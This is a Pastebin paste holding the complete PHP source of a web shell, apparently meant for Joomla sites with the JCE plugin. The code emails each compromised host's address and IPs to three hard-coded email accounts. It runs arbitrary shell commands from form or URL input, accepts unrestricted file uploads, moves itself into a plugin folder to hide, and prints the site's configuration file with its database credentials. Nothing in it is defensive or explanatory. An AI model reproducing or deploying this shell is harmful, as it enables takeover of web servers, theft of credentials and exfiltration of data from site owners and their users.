Advertisement
Guest User

webshell_php_bot_jce

a guest
Sep 13th, 2017
596
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.96 KB | None | 0 0
  1. error_reporting(0);
  2. if (!isset($_SESSION['bajak'])) {
  3. $visitcount = 0;
  4. $web = $_SERVER["HTTP_HOST"];
  5. $inj = $_SERVER["REQUEST_URI"];
  6. $body = "Target ditemukan \n$web$inj";
  7. $safem0de = @ini_get('safe_mode');
  8. if (!$safem0de) {$security= "SAFE_MODE = OFF";}
  9. else {$security= "SAFE_MODE = ON";};
  10. $serper=gethostbyname($_SERVER['SERVER_ADDR']);
  11. $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
  12. mail("aldirianto9@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
  13. mail("karambia159@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
  14. mail("bebeshark@live.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
  15. $_SESSION['bajak'] = 1;
  16. }
  17. else {$_SESSION['bajak']++;};
  18. if(isset($_GET['clone'])){
  19. $source = $_SERVER['SCRIPT_FILENAME'];
  20. $desti =$_SERVER['DOCUMENT_ROOT']."/plugins/user/explore.php";
  21. rename($source, $desti);
  22. }
  23. $safem0de = @ini_get('safe_mode');
  24. if (!$safem0de) {$security= "SAFE_MODE : OFF";}
  25. else {$security= "SAFE_MODE : ON";}
  26. echo "<title>UnKnown - Simple Shell</title><br>";
  27. echo "<font size=2 color=#888888><b>".$security."</b><br>";
  28. $cur_user="(".get_current_user().")";
  29. echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
  30. echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
  31. function pwd() {
  32. $cwd = getcwd();
  33. if($u=strrpos($cwd,'/')){
  34. if($u!=strlen($cwd)-1){
  35. return $cwd.'/';}
  36. else{return $cwd;};
  37. }
  38. elseif($u=strrpos($cwd,'\\')){
  39. if($u!=strlen($cwd)-1){
  40. return $cwd.'\\';}
  41. else{return $cwd;};
  42. };
  43. }
  44. echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
  45. echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
  46. if(isset($_POST['submit'])){
  47. $uploaddir = pwd();
  48. if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
  49. move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
  50. if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
  51. echo "Upload Failed";
  52. } else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
  53. }
  54. if(isset($_POST['command'])){
  55. $cmd = $_POST['cmd'];
  56. echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
  57. }
  58. elseif(isset($_GET['cmd'])){
  59. $comd = $_GET['cmd'];
  60. echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
  61. }
  62. else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
  63. }
  64.  
  65. if(isset($_GET['baca'])){
  66. $conf = file_get_contents("../../configuration.php");
  67. echo $conf;
  68. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement